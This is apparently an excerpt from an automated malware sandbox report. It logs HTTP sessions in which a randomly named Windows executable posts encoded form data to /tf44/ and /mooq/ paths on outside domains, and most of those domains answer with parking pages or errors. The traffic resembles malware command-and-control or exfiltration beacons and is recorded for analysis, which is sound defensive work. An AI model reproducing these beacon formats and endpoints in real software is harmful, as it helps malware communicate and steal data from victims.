Aug 13, 2024 06:45:07.934077978 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Tue, 13 Aug 2024 04:45:07 GMT Server: Apache/2.4.61 (Debian) X-Powered-By: PHP/7.4.33 Strict-Transport-Security: max-age=63072000; preload Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 63 34 39 0d 0a 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 [TRUNCATED] Data Ascii: ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>c49Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber können Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitu
Aug 13, 2024 06:45:07.934102058 CEST	1236	IN	Data Raw: 6e 67 65 6e 20 65 69 6e 72 69 63 68 74 65 6e 2c 20 57 65 62 68 6f 73 74 69 6e 67 20 62 65 73 74 65 6c 6c 65 6e 20 75 6e 64 20 56 69 65 6c 65 73 20 6d 65 68 72 2e 3c 62 72 20 2f 3e 45 62 65 6e 73 6f 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 Data Ascii: ngen einrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso können Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes"><table><tr><td><tab
Aug 13, 2024 06:45:07.934118986 CEST	927	IN	Data Raw: 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 22 3e 3c 69 6d 67 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b Data Ascii: </td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;" src="https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/moodle.png" alt="Moodle" /></td><td style="width:300px;">Moodle ist eine kostenlose und flexi
Aug 13, 2024 06:45:07.934134960 CEST	927	IN	Data Raw: 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 22 3e 3c 69 6d 67 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b Data Ascii: </td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;" src="https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/moodle.png" alt="Moodle" /></td><td style="width:300px;">Moodle ist eine kostenlose und flexi
Aug 13, 2024 06:45:07.934154987 CEST	237	IN	Data Raw: 6c 65 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 64 69 76 3e 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 3e 3c 70 3e 4c 65 64 6c 2e 6e 65 74 20 47 6d 62 48 20 7c 20 77 Data Ascii: le></td></tr></table></div> </div> <div class="footer"><p>Ledl.net GmbH \| www.domaintechnik.at<br/>Lederergasse 6 \| A-5204 Straßwalchen \| Tel.: +43 (0) 6215 / 20888 \| verkauf@domaintechnik.at</p></div></body></html>0
Aug 13, 2024 06:45:07.934186935 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Tue, 13 Aug 2024 04:45:07 GMT Server: Apache/2.4.61 (Debian) X-Powered-By: PHP/7.4.33 Strict-Transport-Security: max-age=63072000; preload Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 63 34 39 0d 0a 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 [TRUNCATED] Data Ascii: ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>c49Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber können Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49741	91.195.240.19	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:45:13.001324892 CEST	776	OUT	POST /tf44/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.gipsytroya.com Origin: http://www.gipsytroya.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Referer: http://www.gipsytroya.com/tf44/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 37 6c 2f 32 47 70 41 55 34 73 54 41 75 68 36 59 41 37 77 46 6f 6e 4a 54 76 38 6f 59 51 47 65 36 58 43 4e 4e 6b 34 4e 58 4a 33 32 59 45 4b 4d 36 46 57 54 69 64 68 43 34 58 4d 64 47 76 2f 5a 77 37 68 6b 37 35 49 2f 4b 32 76 76 7a 45 65 59 46 42 35 6e 51 48 78 4b 50 6c 45 41 36 45 31 69 30 66 32 4e 66 48 69 53 49 71 44 59 58 38 63 69 4f 48 6a 2f 36 52 54 61 53 64 39 67 67 42 54 30 71 4f 39 56 4d 6d 73 31 39 66 64 4a 43 58 38 67 39 68 72 75 63 50 49 4f 52 71 75 38 49 4d 54 53 62 79 62 36 52 68 54 44 39 45 31 67 56 34 2f 51 75 44 77 45 65 48 57 7a 36 50 39 34 3d Data Ascii: jN=+FKgbPBnyVok7l/2GpAU4sTAuh6YA7wFonJTv8oYQGe6XCNNk4NXJ32YEKM6FWTidhC4XMdGv/Zw7hk75I/K2vvzEeYFB5nQHxKPlEA6E1i0f2NfHiSIqDYX8ciOHj/6RTaSd9ggBT0qO9VMms19fdJCX8g9hrucPIORqu8IMTSbyb6RhTD9E1gV4/QuDwEeHWz6P94=
Aug 13, 2024 06:45:13.651595116 CEST	707	IN	HTTP/1.1 405 Not Allowed date: Tue, 13 Aug 2024 04:45:13 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49742	91.195.240.19	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:45:15.537708044 CEST	796	OUT	POST /tf44/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.gipsytroya.com Origin: http://www.gipsytroya.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Referer: http://www.gipsytroya.com/tf44/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 36 45 76 32 45 4b 34 55 2f 4d 54 48 72 68 36 59 57 4c 77 42 6f 6e 56 54 76 35 46 46 58 31 71 36 58 69 39 4e 6c 35 4e 58 4b 33 32 59 63 36 4d 46 4c 32 54 70 64 68 4f 77 58 4a 39 47 76 2f 39 77 37 6c 67 37 35 2f 44 4a 33 2f 76 39 64 4f 59 48 63 70 6e 51 48 78 4b 50 6c 45 6c 76 45 7a 4b 30 66 69 4a 66 57 32 47 4c 6d 6a 59 57 35 73 69 4f 57 7a 2f 2b 52 54 61 67 64 2f 46 46 42 52 38 71 4f 38 6c 4d 6e 39 31 2b 57 64 4a 45 61 63 68 4a 6f 5a 72 33 47 71 2b 61 6d 39 78 4b 64 69 2b 63 36 4e 58 37 37 78 4c 56 58 56 4d 74 6f 73 59 5a 53 41 6c 33 64 31 6a 4b 52 71 74 45 4d 48 55 4c 33 42 64 7a 5a 6c 38 48 4a 49 50 78 2f 31 70 42 Data Ascii: jN=+FKgbPBnyVok6Ev2EK4U/MTHrh6YWLwBonVTv5FFX1q6Xi9Nl5NXK32Yc6MFL2TpdhOwXJ9Gv/9w7lg75/DJ3/v9dOYHcpnQHxKPlElvEzK0fiJfW2GLmjYW5siOWz/+RTagd/FFBR8qO8lMn91+WdJEachJoZr3Gq+am9xKdi+c6NX77xLVXVMtosYZSAl3d1jKRqtEMHUL3BdzZl8HJIPx/1pB
Aug 13, 2024 06:45:16.174560070 CEST	707	IN	HTTP/1.1 405 Not Allowed date: Tue, 13 Aug 2024 04:45:16 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49743	91.195.240.19	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:45:18.070597887 CEST	1813	OUT	POST /tf44/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.gipsytroya.com Origin: http://www.gipsytroya.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Referer: http://www.gipsytroya.com/tf44/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 36 45 76 32 45 4b 34 55 2f 4d 54 48 72 68 36 59 57 4c 77 42 6f 6e 56 54 76 35 46 46 58 30 53 36 58 78 31 4e 6b 61 56 58 4c 33 32 59 43 4b 4d 45 4c 32 54 30 64 6c 69 4b 58 4a 35 57 76 39 31 77 36 47 34 37 2f 4f 44 4a 2b 2f 76 39 41 65 59 47 42 35 6d 4b 48 77 36 31 6c 45 31 76 45 7a 4b 30 66 6a 35 66 57 69 53 4c 6b 6a 59 58 38 63 69 43 48 6a 2f 57 52 51 72 56 64 2f 42 2f 43 69 45 71 4f 63 31 4d 6c 50 74 2b 64 64 4a 47 4a 73 68 52 6f 59 58 6f 47 75 57 34 6d 38 31 30 64 68 65 63 72 49 6e 69 6d 56 58 42 42 56 4e 4f 67 39 49 70 45 31 39 56 65 48 7a 64 51 64 46 79 47 58 49 64 30 33 64 7a 54 6d 52 4a 62 5a 32 2b 37 41 38 69 6d 54 65 2b 6e 47 41 69 56 30 6d 72 75 34 32 58 6c 4f 54 4d 58 4b 78 50 6a 35 39 65 48 4d 4b 72 46 69 6e 32 36 4b 73 57 55 31 4c 31 33 2f 32 73 44 34 38 46 37 35 76 62 77 72 41 50 57 34 31 37 41 31 74 39 31 4f 48 71 54 4f 44 53 62 39 78 6e 58 57 46 59 36 4c 4a 73 4d 78 67 72 74 45 30 4e 56 41 77 64 6d 49 50 41 47 6b 39 33 44 57 62 4b 76 6c 41 [TRUNCATED] Data Ascii: jN=+FKgbPBnyVok6Ev2EK4U/MTHrh6YWLwBonVTv5FFX0S6Xx1NkaVXL32YCKMEL2T0dliKXJ5Wv91w6G47/ODJ+/v9AeYGB5mKHw61lE1vEzK0fj5fWiSLkjYX8ciCHj/WRQrVd/B/CiEqOc1MlPt+ddJGJshRoYXoGuW4m810dhecrInimVXBBVNOg9IpE19VeHzdQdFyGXId03dzTmRJbZ2+7A8imTe+nGAiV0mru42XlOTMXKxPj59eHMKrFin26KsWU1L13/2sD48F75vbwrAPW417A1t91OHqTODSb9xnXWFY6LJsMxgrtE0NVAwdmIPAGk93DWbKvlATDjDHzoLaZLGuxCuNHn4Oc3Lcw8qW9ljCs9g3k/JVgYg9rgnfoMQeyEVVZG91H305bwAjzUaSKavBSJbeY4/84ElgMAp1lbwl9LKP41iPmRwQG7KrRKQTaJHhs9vM9slpQZzV6uZHKg/5FXnih55QIcd+EOQNd0mVFTqXoP+I6utiBS0M5N4b8EHdMV1Sn6FWJuiX0rWC4/EsCCFyHX0cWFeOH4+BZlqkzMkvwlttyG4TKWfBWdQrWabLGDn+9SmLY/ey2wrePtxwqd3nVi55h6e57R0RREK4OTRhWNNua/mobqx/3ihgdUgMEs6IYWO96sseW4Tcf1bCVdPCipmHYt3l7S5Wv+drsEQDUFNOnHkjr4jFim19EYJtEAiihF3075F7Sv22JfRIlFs2PIOFaq4wLJ8ApU96eg3NrjwIjEA6GSahR/6hN7Wl0aJV5Nh/NBxfUBXSluhSB/D6HEDUcL/ZXnDBr9zceSM6YGjCji1uf+SF94rvexeQeF+cj/eJteCZNVKL6tPsDBMscilKbQc1HMGFJqfxQLx/Py2y3hb6K04ZQltSz3E+5NL5iP14X9gbbNABEOkePIPfgLNk0Em0Sc77yjr6ujmuzXxjcsZa32QXwhGN6IQ0hE1V1ZaMH8gIhrHAysnjYvrBgIF/xIqHswWN5F47U [TRUNCATED]
Aug 13, 2024 06:45:18.733165979 CEST	707	IN	HTTP/1.1 405 Not Allowed date: Tue, 13 Aug 2024 04:45:18 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49744	91.195.240.19	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:45:20.603003979 CEST	513	OUT	GET /tf44/?jN=zHiAY6EG+HxIxFu8Foth356DlimOdN8M+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciy2erzG94aXY3gKTO0tUNpFmCuOm5+YFWh8hIX5dCVSC+GNg==&uXTT=8FDHY8dP HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.gipsytroya.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 13, 2024 06:45:21.238698959 CEST	113	IN	HTTP/1.1 439 date: Tue, 13 Aug 2024 04:45:21 GMT content-length: 0 server: Parking/1.0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49745	194.58.112.174	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:45:26.359544039 CEST	791	OUT	POST /mooq/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.helpers-lion.online Origin: http://www.helpers-lion.online Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Referer: http://www.helpers-lion.online/mooq/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 33 41 52 4a 70 41 4f 43 46 54 64 57 33 52 42 38 33 49 62 4b 43 6f 51 66 34 6b 2f 52 64 68 69 31 57 79 69 69 30 73 54 56 46 56 2f 4c 66 58 36 68 4a 69 54 4e 38 41 56 6d 75 53 62 39 4f 61 33 48 72 48 4d 52 51 6a 63 45 44 76 62 36 48 52 49 34 67 43 49 6a 6e 4e 63 6a 52 47 45 6d 35 33 56 71 68 43 75 77 46 6d 62 4e 68 41 74 45 54 2f 77 4a 47 6e 61 37 59 38 58 33 6e 4e 7a 44 6c 67 6d 39 4f 45 64 41 49 2f 36 55 7a 56 52 61 74 4e 68 4f 34 71 4b 45 6d 78 30 4c 6f 41 37 75 41 46 71 72 44 48 69 4e 64 71 4f 51 4f 62 2b 53 70 62 6b 53 43 47 6f 53 61 36 4e 6c 79 68 4b 79 4a 57 55 41 72 71 47 69 2b 36 34 3d Data Ascii: jN=3ARJpAOCFTdW3RB83IbKCoQf4k/Rdhi1Wyii0sTVFV/LfX6hJiTN8AVmuSb9Oa3HrHMRQjcEDvb6HRI4gCIjnNcjRGEm53VqhCuwFmbNhAtET/wJGna7Y8X3nNzDlgm9OEdAI/6UzVRatNhO4qKEmx0LoA7uAFqrDHiNdqOQOb+SpbkSCGoSa6NlyhKyJWUArqGi+64=
Aug 13, 2024 06:45:27.053534031 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 13 Aug 2024 04:45:26 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba [TRUNCATED] Data Ascii: 